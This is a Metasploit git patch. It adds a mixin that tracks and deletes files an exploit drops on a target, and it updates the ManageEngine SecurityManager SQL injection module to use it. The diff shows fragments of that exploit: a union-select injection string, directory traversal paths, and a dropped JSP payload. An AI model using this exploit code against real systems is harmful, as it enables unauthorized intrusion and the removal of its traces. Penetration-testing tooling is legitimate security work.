From 83708a5a48b08bb47d49e8bcfca715cd1c9e9885 Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Thu, 15 Nov 2012 17:52:10 -0600
Subject: [PATCH] Add a FileDropper mixin for recording cleanup targets

Doesn't cover shell sessions yet, so needs a bit more work
---
 lib/msf/core/exploit/file_dropper.rb          | 72 +++++++++++++++++++
 .../multi/http/manageengine_search_sqli.rb    | 28 +++++---
 2 files changed, 92 insertions(+), 8 deletions(-)
 create mode 100644 lib/msf/core/exploit/file_dropper.rb

diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb
new file mode 100644
index 0000000000..eed1bb3e58
--- /dev/null
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -0,0 +1,72 @@
+# -*- coding: binary -*-
+
+module Msf
+module Exploit::FileDropper
+
+	#
+	# When a new session is created, attempt to delete any files that the
+	# exploit created.
+	#
+	# @param (see Msf::Exploit#on_new_session)
+	# @return [void]
+	#
+	def on_new_session(session)
+		if session.type == "meterpreter"
+			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+		end
+
+		@dropped_files.delete_if do |file|
+			if session.type == "meterpreter"
+				begin
+					session.fs.file.rm(file)
+					print_good("Deleted #{file}")
+					true
+				rescue ::Rex::Post::Meterpreter::RequestError
+					false
+				end
+			else
+				# Need to be platform-independent here. Not sure of the best way
+				# to do that since we can't be certain that {#target} is
+				# accurate; exploits with automatic targets frequently change
+				# it.
+				false
+			end
+		end
+
+		super
+	end
+
+	#
+	# Record file as needing to be cleaned up
+	#
+	# @param files [Array<String>] List of paths on the target that should
+	#   be deleted during cleanup. Each filename should be either a full
+	#   path or relative to the current working directory of the session
+	#   (not necessarily the same as the cwd of the server we're
+	#   exploiting).
+	# @return [void]
+	def register_files_for_cleanup(*files)
+		@dropped_files ||= []
+		@dropped_files += files
+
+		nil
+	end
+
+	# Singular version
+	alias register_file_for_cleanup register_files_for_cleanup
+
+	#
+	# Warn the user if any files (registered with {#register_dropped_file}) were
+	# not cleaned up
+	#
+	# @see Msf::Exploit#cleanup
+	def cleanup
+		super
+		if @dropped_files and @dropped_files.any?
+			@dropped_files.each do |f|
+				print_warning("This exploit may require manual cleanup of: #{f}")
+			end
+		end
+	end
+end
+end
diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb
index 8b27eb6f73..c02b4c88e9 100644
--- a/modules/exploits/multi/http/manageengine_search_sqli.rb
+++ b/modules/exploits/multi/http/manageengine_search_sqli.rb
@@ -6,11 +6,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/file_dropper'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
 	include Msf::Exploit::EXE
 
 	def initialize(info={})
@@ -68,9 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		rnd_num   = Rex::Text.rand_text_numeric(1)
 		rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
-		outpath   = "../../webapps/SecurityManager/#{rnd_fname}"
+		clean_path= "../webapps/SecurityManager/#{rnd_fname}"
+		outpath   = "../" + clean_path
 
-		@clean_ups << outpath
+		register_file_for_cleanup(clean_path)
 
 		sqli  = "#{rnd_num})) union select @@version,"
 		sqli << (2..28).map {|e| e} * ","
@@ -95,6 +98,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
+=begin
+Now covered by FileDropper mixin. Keep it here, commented out, for now
+since FileDropper doesn't cover shell sessions yet.
+
 	#
 	# We're in SecurityManager/bin at this point
 	#
@@ -127,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 		}
 	end
+=end
 
 
 	#
@@ -229,6 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'COUNT'       => '1'
 			}
 		})
+
 	end
 
 	#
@@ -253,9 +262,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exploit
-		# This is used to collect files we want to delete later
-		@clean_ups = []
-
 		@my_target = pick_target
 		if @my_target.nil?
 			print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
@@ -263,10 +269,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		jsp_name  = rand_text_alpha(rand(6)+3)
-		outpath   = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+		# The working directory when our payload runs is
+		# c:/AdventNet/SecurityManager/bin/
+		# while the jsp file will be in
+		# c:/AdventNet/SecurityManager/webapps/SecurityManager/
+		# so we need to adjust the traversal level.
+		clean_path= "../webapps/SecurityManager/#{jsp_name + '.jsp'}"
+		outpath   = "../" + clean_path
 
-		@clean_ups << outpath
+		register_file_for_cleanup(clean_path)
 
 		inject_exec(outpath)
 	end
-end
\ No newline at end of file
+end